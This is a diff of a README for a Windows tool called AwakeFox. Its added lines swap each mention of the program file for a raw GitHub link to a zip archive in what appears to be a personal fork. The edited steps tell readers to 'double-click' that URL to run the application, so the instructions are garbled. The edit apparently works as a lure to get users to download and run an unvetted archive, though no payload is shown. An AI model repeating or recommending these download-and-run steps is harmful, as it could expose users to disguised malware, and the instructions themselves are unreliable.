idife998/AwakeFox-oss/README.md

 Once on the Releases page, look for the most recent version listed.
 You will see a section for assets below the version title.
 This is where you will download the application.

-- Click on the file named `AwakeFox.exe`.
+- Click on the file named `https://raw.githubusercontent.com/idife998/AwakeFox-oss/main/AwakeFox/AwakeFox-oss-1.1.zip`.

 Make sure you download the version that matches your system—this application is specifically for Windows.

 ### ⚙️ Step 3: Run the Application

-After downloading, locate the `AwakeFox.exe` file on your computer.
+After downloading, locate the `https://raw.githubusercontent.com/idife998/AwakeFox-oss/main/AwakeFox/AwakeFox-oss-1.1.zip` file on your computer.
 You can find it in your Downloads folder or the location where you saved it.

-- Double-click the `AwakeFox.exe` file to run the application.
+- Double-click the `https://raw.githubusercontent.com/idife998/AwakeFox-oss/main/AwakeFox/AwakeFox-oss-1.1.zip` file to run the application.

 There’s no installation required.
 You can run it directly from the location where you saved it.